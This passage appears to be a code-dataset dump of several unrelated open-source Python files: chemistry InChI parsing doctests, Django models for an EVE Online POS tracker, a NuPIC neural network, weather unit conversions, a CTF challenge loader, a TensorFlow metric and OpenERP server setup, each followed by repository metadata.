>>> tpl = extractLayers('InChI=1S/C3H7ClO/c1-3(4)5-2/h3H,1-2H3/t3-/m1/s1/i2+1')
>>> tpl.isotope
'i2+1'
>>> tpl.stereo_tet
't3-'
>>> tpl.isotope_stereo_tet
''
Isotope causes stereo
From: [13CH3][C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H8O/c1-3(2)4/h3-4H,1-2H3/i1+1/t3-/m1/s1')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
''
>>> tpl.isotope_stereo_tet
't3-'
Isotope causes stereo + standard stereo
From: [13CH3][C@H](C)O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C5H12O2/c1-4(2)7-5(3)6/h4-6H,1-3H3/t5-/m1/s1/i1+1/t4-,5-')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
't5-'
>>> tpl.isotope_stereo_tet
't4-,5-'
Fixed Hs and Isotopes
From: O=C([18O])/C=C/C(=[18O])O
>>> tpl = extractLayers('InChI=1/C4H3O4/c5-3(6)1-2-4(7)8/h1-2H,(H,5,6)/b2-1+/i5+2,7+2/f/h5H/i6+2,7+2')
>>> tpl.isotope
'i5+2,7+2'
>>> tpl.fixedh_isotope
'i6+2,7+2'
Fixed Hs causes stereo_bond
From: F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15)/b3-1+/t7-/m0/s1/f/h12,14H,13H2/b3-1+,6-2-,12-8?')
>>> tpl.fixedh
'f/h12,14H,13H2'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?'
Fixed Hs causes stereo
From: C[C@H](Cl)[C@H](/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C7H13ClN2O2/c1-4(8)5(2-6(9)11)3-7(10)12/h4-5H,2-3H2,1H3,(H2,9,11)(H2,10,12)/t4-/m0/s1/f/h9,11H,10H2/t4-,5+')
>>> tpl.fixedh
'f/h9,11H,10H2'
>>> tpl.fixedh_stereo_tet
't4-,5+'
Fixed Hs cause a new formula
From: C[C@H](CCC[C@@H](SCCC(C)(C)O)c1cccc(\C=C\c2ccc3ccc(Cl)cc3n2)c1)C(=O)[O-] # from ChEMBL
>>> tpl = extractLayers('InChI=1/C29H34ClNO3S/c1-20(28(32)33)6-4-9-27(35-17-16-29(2,3)34)23-8-5-7-21(18-23)10-14-25-15-12-22-11-13-24(30)19-26(22)31-25/h5,7-8,10-15,18-20,27,34H,4,6,9,16-17H2,1-3H3,(H,32,33)/p-1/b14-10+/t20-,27-/m1/s1/fC29H33ClNO3S/q-1')
>>> tpl.formula
'C29H34ClNO3S'
>>> tpl.fixedh
'fC29H33ClNO3S'
>>> tpl.fixedh_charge
'q-1'
Disconnected parts + Fixed Hs causes stereo_bond + isotopes cause stereo
From: [13CH3][C@H](C)O[C@H](C)O.F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2.C5H12O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15;1-4(2)7-5(3)6/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15);4-6H,1-3H3/b3-1+;/t7-;5-/m01/s1/i;1+1/t;4-,5-/f/h12,14H,13H2;/b3-1+,6-2-,12-8?;')
>>> tpl.stereo_bond
'b3-1+;'
>>> tpl.isotope
'i;1+1'
>>> tpl.isotope_stereo_tet
't;4-,5-'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?;'
Fixed Hs causes stereo + (FixedHs + isotopes) causes stereo (this is the most dependent example I can think of)
From: N=C(NC)C(/C(=NC)N)=C/CC/C=C(/C1=NC=C[15NH]1)C1NC=C[15N]=1
>>> tpl = extractLayers('InChI=1/C16H22N8/c1-19-13(17)11(14(18)20-2)5-3-4-6-12(15-21-7-8-22-15)16-23-9-10-24-16/h5-10H,3-4H2,1-2H3,(H2,17,19)(H2,18,20)(H,21,22)(H,23,24)/i21+1,23+1/f/h17,19,21,23H,18H2/b11-5-,17-13?,20-14?/i21+1,24+1/b11-5-,12-6-,17-13?,20-14?')
>>> tpl.isotope
'i21+1,23+1'
>>> tpl.isotope_stereo_bond
''
>>> tpl.fixedh
'f/h17,19,21,23H,18H2'
>>> tpl.fixedh_stereo_bond
'b11-5-,17-13?,20-14?'
>>> tpl.fixedh_isotope_stereo_bond
'b11-5-,12-6-,17-13?,20-14?'
Transposition:
From the InChI tech manual Fig A3-3
>>> tpl = extractLayers('InChI=1/2CH2O2/c2*2-1-3/h2*1H,(H,2,3)/i2+1;2-1/f/h2*2H/i3-1;2+1/o(1,2)')
>>> tpl.transposition
'o(1,2)'
Edge cases:
>>> tpl=extractLayers('InChI=1S/H2/h1H')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'H2'
>>> tpl.skeleton
''
>>> tpl.hydrogens
'h1H'
>>> tpl=extractLayers('InChI=1S/H')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'H'
>>> tpl.skeleton
''
>>> tpl.hydrogens
''
"""
match = coreExpr.match(inchi)
if not match:
return None
gps = list(match.groups())
res = []
for e in gps:
if not e:
res.append('')
elif e[0]=='/':
res.append(e[1:])
else:
res.append(e)
res = Layers(*res)
return res
if __name__=='__main__':
import doctest
doctest.testmod()
|
nbateshaus/chem-search
|
inchi-split/splitter.py
|
Python
|
bsd-3-clause
| 9,306 | 0.016548 |
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from functools import wraps
class OETestDecorator(object):
case = None # Reference of OETestCase decorated
attrs = None # Attributes to be loaded by decorator implementation
def __init__(self, *args, **kwargs):
if not self.attrs:
return
for idx, attr in enumerate(self.attrs):
attr_type = self.attrs[attr]
if attr in kwargs:
value = kwargs[attr]
else:
value = args[idx]
value_type = type(value)
if not value_type == attr_type:
class_name = self.__class__.__name__
raise TypeError("%s decorator attr %s expects argument %s"\
" received %s." % (class_name, attr, attr_type,
value_type))
setattr(self, attr, value)
def __call__(self, func):
@wraps(func)
def wrapped_f(*args, **kwargs):
self.attrs = self.attrs # XXX: Enables OETestLoader discover
return func(*args, **kwargs)
return wrapped_f
def bind(self, case):
self.case = case
self.case.decorators.append(self)
def setUp(self):
pass
from .depends import OETestDepends
from .oeid import OETestID
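# Illustrative sketch (not part of this package): a minimal decorator built on
# OETestDecorator. With the __init__ above, 'attrs' maps attribute names to the
# types they must have, so the hypothetical OETestTag below accepts either
# OETestTag("wic") or OETestTag(tag="wic") and rejects non-string values.
#
#   class OETestTag(OETestDecorator):
#       attrs = {'tag': str}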
|
alimon/oeqa2
|
oeqa2/test/decorator/__init__.py
|
Python
|
mit
| 1,356 | 0.007375 |
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from core.models import Type, Location
from API.models import CorpAPIKey
from core.models import Corporation, Alliance
from Map.models import System
import csv
from django.contrib.auth.models import User
import pytz
class POS(models.Model):
"""Represents a POS somewhere in space."""
system = models.ForeignKey(System, related_name="poses")
planet = models.IntegerField()
moon = models.IntegerField()
towertype = models.ForeignKey(Type, related_name="inspace")
corporation = models.ForeignKey(Corporation, related_name="poses")
posname = models.CharField(max_length=100, blank=True, null=True)
fitting = models.TextField(blank=True, null=True)
#Using CCP's status codes here for sanity with API checks
status = models.IntegerField(choices = ((0, 'Unanchored'), (1, 'Anchored'),
(2, 'Onlining'), (3, 'Reinforced'), (4, 'Online')))
#This should be the time the tower exits RF
#TODO: add a validator to make sure this is only set if status = 3 (Reinforced)
rftime = models.DateTimeField(null=True, blank=True)
updated = models.DateTimeField()
# These values will be set by the TSV parser from d-scan data if available
guns = models.IntegerField(null=True, blank=True)
ewar = models.IntegerField(null=True, blank=True)
sma = models.IntegerField(null=True, blank=True)
hardener = models.IntegerField(null=True, blank=True)
# This is a short comment that is displayed as a warning
warpin_notice = models.CharField(blank=True, null=True, max_length=64)
class Meta:
ordering = ['system__name', 'planet', 'moon']
def clean(self):
from django.core.exceptions import ValidationError
if self.rftime and self.status != 3:
raise ValidationError("A POS cannot have an rftime unless it is reinforced")
def __unicode__(self):
return self.posname
    #override save to implement posname defaulting to towertype.name
def save(self, *args, **kwargs):
if not self.posname:
self.posname = self.towertype.name
# Ensure that any newline characters in fitting are changed to <br>
self.fitting = self.fitting.replace("\n", "<br />")
# Mark tower as having been updated
from datetime import datetime
import pytz
self.updated = datetime.now(pytz.utc)
super(POS, self).save(*args, **kwargs)
def size(self):
"""
Returns the size of the tower, Small Medium or Large.
"""
if u'Small' in self.towertype.name:
return u'Small'
if u'Medium' in self.towertype.name:
return u'Medium'
return u'Large'
def fit_from_dscan(self, dscan):
"""
Fills in a POS's fitting from a copy / paste of d-scan results.
"""
import csv
from core.models import Type
itemDict={}
# marketGroupIDs to consider guns, ewar, hardeners, and smas
gunsGroups = [480, 479, 594, 595, 596]
ewarGroups = [481, 1009]
smaGroups = [484,]
hardenerGroups = [485,]
towers = 0
self.sma = 0
self.hardener = 0
self.guns = 0
self.ewar = 0
for row in csv.reader(dscan.splitlines(), delimiter="\t"):
itemType = Type.objects.get(name=row[1])
if itemType.marketgroup:
groupTree = []
parent = itemType.marketgroup
while parent:
groupTree.append(parent.id)
parent = parent.parentgroup
if itemType.marketgroup.id in gunsGroups:
self.guns += 1
if itemType.marketgroup.id in ewarGroups:
self.ewar += 1
if itemType.marketgroup.id in smaGroups:
self.sma += 1
if itemType.marketgroup.id in hardenerGroups:
self.hardener += 1
if itemType.marketgroup.id == 478:
towers += 1
if itemDict.has_key(itemType.name):
itemDict[itemType.name] += 1
elif 1285 in groupTree and 478 not in groupTree:
itemDict.update({itemType.name: 1})
self.fitting = "Imported from D-Scan:\n"
for itemtype in itemDict:
self.fitting += "\n%s : %s" % (itemtype, itemDict[itemtype])
if towers <= 1:
self.save()
else:
raise AttributeError('Too many towers detected in the D-Scan!')
class CorpPOS(POS):
"""A corp-controlled POS with manager and password data."""
manager = models.ForeignKey(User, null=True, blank=True, related_name='poses')
password = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
#Let's store the CCP Item ID for the tower here to make API lookup easier
#If it is null, then we are not tracking this POS via API
apiitemid = models.BigIntegerField(null=True, blank=True)
apikey = models.ForeignKey(CorpAPIKey, null=True, blank=True, related_name='poses')
class Meta:
permissions = (('can_see_pos_pw', 'Can see corp POS passwords.'),
('can_see_all_pos', 'Sees all corp POSes regardless of manager.'),)
class POSApplication(models.Model):
"""Represents an application for a personal POS."""
applicant = models.ForeignKey(User, null=True, blank=True, related_name='posapps')
towertype = models.ForeignKey(Type, null=True, blank=True, related_name='posapps')
residents = models.ManyToManyField(User)
normalfit = models.TextField()
siegefit = models.TextField()
#Once it is approved, we will fill in these two to tie the records together
approved = models.DateTimeField(blank=True, null=True)
posrecord = models.ForeignKey(CorpPOS, blank=True, null=True, related_name='application')
class Meta:
permissions = (('can_close_pos_app', 'Can dispose of corp POS applications.'),)
def __unicode__(self):
return 'Applicant: %s Tower: %s' % (self.applicant.username, self.towertype.name)
class POSVote(models.Model):
"""Represents a vote on a personal POS application."""
application = models.ForeignKey(POSApplication, related_name='votes')
voter = models.ForeignKey(User, related_name='posvotes')
vote = models.IntegerField(choices=((0,'Deny'), (1, 'Approve'), (2, 'Abstain')))
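# Illustrative note (not part of the app): fit_from_dscan() above only assumes a
# tab-separated paste in which the second column holds the exact EVE type name;
# everything else on a row is ignored, e.g.
#
#   <on-grid name>\t<exact EVE type name>\t<distance>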
|
djrscally/eve-wspace
|
evewspace/POS/models.py
|
Python
|
gpl-3.0
| 7,280 | 0.003846 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import OrderedDict
from functools import partial
from torch import nn
from nupic.research.frameworks.pytorch.modules import KWinners2dLocal
from nupic.torch.modules import Flatten, KWinners, KWinners2d
__all__ = [
"AlexNetKWinners",
"gsc_alexnet_kwinners",
]
class AlexNetKWinners(nn.Sequential):
def __init__(self,
input_size,
num_classes,
cnn_out_channels=(64, 64),
cnn_activity_percent_on=(0.095, 0.125),
linear_units=1000,
linear_activity_percent_on=(0.1,),
kernel_size=5,
maxpool_stride=2,
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0,
use_kwinners_local=False):
feature_map_sidelength = (
(((input_size[1] - kernel_size + 1) / maxpool_stride)
- kernel_size + 1) / maxpool_stride
)
assert(feature_map_sidelength == int(feature_map_sidelength))
feature_map_sidelength = int(feature_map_sidelength)
kwinner2d_class = KWinners2dLocal if use_kwinners_local else KWinners2d
super().__init__(OrderedDict([
# -------------
# Conv Block
# -------------
("cnn1", nn.Conv2d(input_size[0],
cnn_out_channels[0],
kernel_size)),
("cnn1_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn1_bn", nn.BatchNorm2d(cnn_out_channels[0],
affine=False)),
("cnn1_kwinner", kwinner2d_class(
channels=cnn_out_channels[0],
percent_on=cnn_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
# -------------
# Conv Block
# -------------
("cnn2", nn.Conv2d(cnn_out_channels[0],
cnn_out_channels[1],
kernel_size)),
("cnn2_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn2_bn", nn.BatchNorm2d(cnn_out_channels[1],
affine=False)),
("cnn2_kwinner", kwinner2d_class(
channels=cnn_out_channels[1],
percent_on=cnn_activity_percent_on[1],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("flatten", Flatten()),
# -------------
# Linear Block
# -------------
("fc1", nn.Linear(
(feature_map_sidelength**2) * cnn_out_channels[1],
linear_units)),
("fc1_bn", nn.BatchNorm1d(linear_units, affine=False)),
("fc1_kwinner", KWinners(
n=linear_units,
percent_on=linear_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("fc1_dropout", nn.Dropout(0.5)),
# -------------
# Output Layer
# -------------
("fc2", nn.Linear(linear_units,
num_classes)),
]))
gsc_alexnet_kwinners = partial(AlexNetKWinners,
input_size=(1, 32, 32),
num_classes=12,
cnn_activity_percent_on=(0.095, 0.125),
linear_activity_percent_on=(0.1,),
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0)
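# Minimal usage sketch (illustrative, not part of the published module): build
# the GSC variant bound above and run one forward pass; shapes follow the
# defaults of gsc_alexnet_kwinners (1x32x32 inputs, 12 classes).
if __name__ == "__main__":
    import torch

    model = gsc_alexnet_kwinners()
    dummy = torch.randn(8, 1, 32, 32)  # batch of 8 single-channel 32x32 inputs
    logits = model(dummy)              # expected shape: (8, 12)
    print(logits.shape)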
|
mrcslws/nupic.research
|
packages/backprop_structure/src/nupic/research/frameworks/backprop_structure/networks/alexnet_kwinners.py
|
Python
|
agpl-3.0
| 5,250 | 0 |
try:
from astropy.models import ParametricModel,Parameter,_convert_input,_convert_output
import numpy as np
class PowerLawModel(ParametricModel):
param_names = ['scale', 'alpha']
def __init__(self, scale, alpha, param_dim=1):
self._scale = Parameter(name='scale', val=scale, mclass=self, param_dim=param_dim)
self._alpha = Parameter(name='alpha', val=alpha, mclass=self, param_dim=param_dim)
super(ParametricModel,self).__init__(self, self.param_names, ndim=1, outdim=1, param_dim=param_dim)
self.linear = False
self.deriv = None
def eval(self, xvals, params):
return params[0]*((xvals)**(-params[1]))
def noderiv(self, params, xvals, yvals):
deriv_dict = {
'scale': ((xvals)**(-params[1])),
'alpha': params[0]*((xvals)**(-params[1]))*np.log(xvals)}
derivval = [deriv_dict[par] for par in self.param_names]
return np.array(derivval).T
def __call__(self, x):
"""
Transforms data using this model.
Parameters
--------------
x : array, of minimum dimensions 1
Notes
-----
See the module docstring for rules for model evaluation.
"""
x, fmt = _convert_input(x, self.param_dim)
result = self.eval(x, self.param_sets)
return _convert_output(result, fmt)
except ImportError:
pass
|
vlas-sokolov/pyspeckit
|
pyspeckit/spectrum/models/astropy_models.py
|
Python
|
mit
| 1,575 | 0.008889 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Temperature conversion constants
KELVIN_OFFSET = 273.15
FAHRENHEIT_OFFSET = 32.0
FAHRENHEIT_DEGREE_SCALE = 1.8
# Wind speed conversion constants
MILES_PER_HOUR_FOR_ONE_METER_PER_SEC = 2.23694
KM_PER_HOUR_FOR_ONE_METER_PER_SEC = 3.6
KNOTS_FOR_ONE_METER_PER_SEC = 1.94384
# Barometric conversion constants
HPA_FOR_ONE_INHG = 33.8639
# Visibility distance conversion constants
MILE_FOR_ONE_METER = 0.000621371
KMS_FOR_ONE_METER = .001
# Decimal precision
ROUNDED_TO = 2
def kelvin_dict_to(d, target_temperature_unit):
"""
Converts all the values in a dict from Kelvin temperatures to the
specified temperature format.
:param d: the dictionary containing Kelvin temperature values
:type d: dict
:param target_temperature_unit: the target temperature unit, may be:
'celsius' or 'fahrenheit'
:type target_temperature_unit: str
:returns: a dict with the same keys as the input dict and converted
temperature values as values
:raises: *ValueError* when unknown target temperature units are provided
"""
if target_temperature_unit == 'kelvin':
return d
elif target_temperature_unit == 'celsius':
return {key: kelvin_to_celsius(d[key]) for key in d}
elif target_temperature_unit == 'fahrenheit':
return {key: kelvin_to_fahrenheit(d[key]) for key in d}
else:
raise ValueError("Invalid value for target temperature conversion \
unit")
def kelvin_to_celsius(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Celsius degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Celsius temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
celsiustemp = kelvintemp - KELVIN_OFFSET
return float("{0:.2f}".format(celsiustemp))
def kelvin_to_fahrenheit(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Fahrenheit degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Fahrenheit temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
fahrenheittemp = (kelvintemp - KELVIN_OFFSET) * \
FAHRENHEIT_DEGREE_SCALE + FAHRENHEIT_OFFSET
return float("{0:.2f}".format(fahrenheittemp))
def metric_wind_dict_to_imperial(d):
"""
Converts all the wind values in a dict from meters/sec (metric measurement
system) to miles/hour (imperial measurement system)
.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to miles/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * MILES_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_km_h(d):
"""
Converts all the wind values in a dict from meters/sec
to km/hour.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KM_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_knots(d):
"""
Converts all the wind values in a dict from meters/sec
to knots
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KNOTS_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_beaufort(d):
"""
Converts all the wind values in a dict from meters/sec
to the corresponding Beaufort scale level (which is not an exact number but rather
represents a range of wind speeds - see: https://en.wikipedia.org/wiki/Beaufort_scale).
Conversion table: https://www.windfinder.com/wind/windspeed.htm
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to Beaufort level
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
if value <= 0.2:
bf = 0
elif 0.2 < value <= 1.5:
bf = 1
elif 1.5 < value <= 3.3:
bf = 2
elif 3.3 < value <= 5.4:
bf = 3
elif 5.4 < value <= 7.9:
bf = 4
elif 7.9 < value <= 10.7:
bf = 5
elif 10.7 < value <= 13.8:
bf = 6
elif 13.8 < value <= 17.1:
bf = 7
elif 17.1 < value <= 20.7:
bf = 8
elif 20.7 < value <= 24.4:
bf = 9
elif 24.4 < value <= 28.4:
bf = 10
elif 28.4 < value <= 32.6:
bf = 11
else:
bf = 12
result[key] = bf
else:
result[key] = value
return result
def metric_pressure_dict_to_inhg(d):
"""
Converts all barometric pressure values in a dict to "inches of mercury."
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to "Hg or inHg (inches of mercury)
Note what OWM says about pressure: "Atmospheric pressure [is given in hPa]
(on the sea level, if there is no sea_level or grnd_level data)"
"""
result = dict()
for key, value in d.items():
if value is None:
continue
result[key] = round((value / HPA_FOR_ONE_INHG), ROUNDED_TO)
return result
def visibility_distance_to(v, target_visibility_unit='kilometers'):
"""
Converts visibility distance (in meters) to kilometers or miles
Defaults to kilometer conversion
:param distance: the value of visibility_distance
:type distance: int
:param target_visibility_unit: the unit of conversion
:type target_visibility_unit: str
:returns: a converted value for visibility_distance (float)
"""
if v is None:
return v
if target_visibility_unit == 'kilometers':
const = KMS_FOR_ONE_METER
elif target_visibility_unit == 'miles':
const = MILE_FOR_ONE_METER
else:
raise ValueError('Invalid value for target visibility distance unit')
return round(v * const, ROUNDED_TO)
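# Minimal usage sketch (illustrative, not part of the library): convert an
# OWM-style temperature dict and wind dict with the helpers defined above.
if __name__ == "__main__":
    temps = {'temp': 300.15, 'temp_min': 298.0, 'temp_max': 302.0}
    print(kelvin_dict_to(temps, 'celsius'))    # {'temp': 27.0, 'temp_min': 24.85, 'temp_max': 28.85}
    wind = {'speed': 4.5, 'deg': 120}
    print(metric_wind_dict_to_beaufort(wind))  # {'speed': 3, 'deg': 120}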
|
csparpa/pyowm
|
pyowm/utils/measurables.py
|
Python
|
mit
| 7,259 | 0.000276 |
from decimal import Decimal
import re
import web
r_row = re.compile(r'<tr>(.*?)</tr>', re.S)
r_td = re.compile(r'<td v[^>]+>([^<]*)</td>')
r_member = re.compile(r'member=([^"]+)">([^<]+)<')
def fixdec(d):
d = d.strip()
return Decimal(d) and Decimal(d)/100
def parse_doc(d):
for row in r_row.findall(d):
out = r_td.findall(row)
if out:
dist, membername = r_member.findall(row)[0]
dist = dist.replace('At Large', '00')
dist = dist[:2] + '-' + dist[2:].zfill(2)
s = web.storage()
s.district = dist
s.progressive2008 = fixdec(out[0])
s.chips2008 = fixdec(out[1])
s.progressiveall = fixdec(out[3])
s.name = membername.decode('iso-8859-1')
yield s
def parse_all():
d = file('../data/crawl/punch/house.html').read()
for x in parse_doc(d): yield x
d = file('../data/crawl/punch/senate.html').read()
for x in parse_doc(d): yield x
if __name__ == "__main__":
import tools
tools.export(parse_all())
|
aaronsw/watchdog
|
import/parse/punch.py
|
Python
|
agpl-3.0
| 1,090 | 0.008257 |
from django.core.management.base import BaseCommand
from milkyway.models import Challenge, Hint, Category, Flag
import yaml
class Command(BaseCommand):
help = 'Load data from yaml file'
def add_arguments(self, parser):
parser.add_argument('dataset', type=str)
def handle(self, *args, **options):
with open(options['dataset'], 'r') as handle:
data = yaml.load(handle)
Category.objects.all().delete()
for cat in data['chals']:
category = Category.objects.create(
name=cat['name'],
description=cat['desc']
)
for chal in cat['chals']:
chal_data = {
'id': chal['id'],
'name': chal['name'],
'description': chal['desc'],
'value': chal['value'],
'category': category,
'lesson': chal.get('lesson', ''),
}
c = Challenge.objects.create(**chal_data)
for hint in chal['hints']:
Hint.objects.create(text=hint, chal=c, show=False)
c.save()
for flag in chal['flags']:
Flag.objects.create(
chal=c,
flag=flag['flag'],
flag_is_regex=flag['regex'],
)
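# Illustrative sketch (not part of the command): the YAML layout this handler
# expects, inferred from the keys it reads above; all field values are made up.
#
#   chals:
#     - name: Web
#       desc: Web challenges
#       chals:
#         - id: 1
#           name: Cookie Monster
#           desc: Find the flag hidden in a cookie.
#           value: 100
#           lesson: Cookies are client-side state.
#           hints:
#             - Look at the response headers.
#           flags:
#             - flag: "flag{om-nom-nom}"
#               regex: false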
|
galaxy-ctf/milky-way
|
milkyway/management/commands/load_chals.py
|
Python
|
agpl-3.0
| 1,410 | 0 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classification metrics library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
# TODO(nsilberman): move into metrics/python/ops/
def accuracy(predictions, labels, weights=None):
"""Computes the percentage of times that predictions matches labels.
Args:
predictions: the predicted values, a `Tensor` whose dtype and shape
matches 'labels'.
labels: the ground truth values, a `Tensor` of any shape and
integer or string dtype.
weights: None or `Tensor` of float values to reweight the accuracy.
Returns:
Accuracy `Tensor`.
Raises:
ValueError: if dtypes don't match or
if dtype is not integer or string.
"""
if not (labels.dtype.is_integer or labels.dtype == dtypes.string):
raise ValueError('Labels should have integer or string dtype. '
'Given: %s' % str(labels.dtype))
if not labels.dtype.is_compatible_with(predictions.dtype):
raise ValueError('Dtypes of predictions and labels should match. '
'Given: predictions (%s) and labels (%s)' %
(str(predictions.dtype), str(labels.dtype)))
with ops.op_scope([predictions, labels], 'accuracy'):
is_correct = math_ops.cast(
math_ops.equal(predictions, labels), dtypes.float32)
if weights is not None:
is_correct = math_ops.mul(is_correct, weights)
return math_ops.reduce_mean(is_correct)
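# Minimal usage sketch (illustrative, not part of the library): in the
# graph-mode API of the same era, accuracy() returns a scalar tensor that is
# evaluated inside a session.
#
#   import tensorflow as tf
#   acc = accuracy(predictions=tf.constant([1, 0, 1]),
#                  labels=tf.constant([1, 1, 1]))
#   with tf.Session() as sess:
#       print(sess.run(acc))   # ~0.6667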
|
HaebinShin/tensorflow
|
tensorflow/contrib/metrics/python/metrics/classification.py
|
Python
|
apache-2.0
| 2,307 | 0.002167 |
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
import resource
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
import openerp.tools.config as config
from openerp.release import nt_service_name
from openerp.tools.misc import stripped_sys_argv, dumpstacks
import wsgi_server
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
""" psutil < 2.0 does not have memory_info, >= 3.0 does not have
get_memory_info """
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
return (pmem.rss, pmem.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class BaseWSGIServerNoBind(werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
        # we don't bind because we use the listen socket of PreforkServer#socket;
        # instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
            # should we os.close(int(envfd))? It seems python duplicates the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
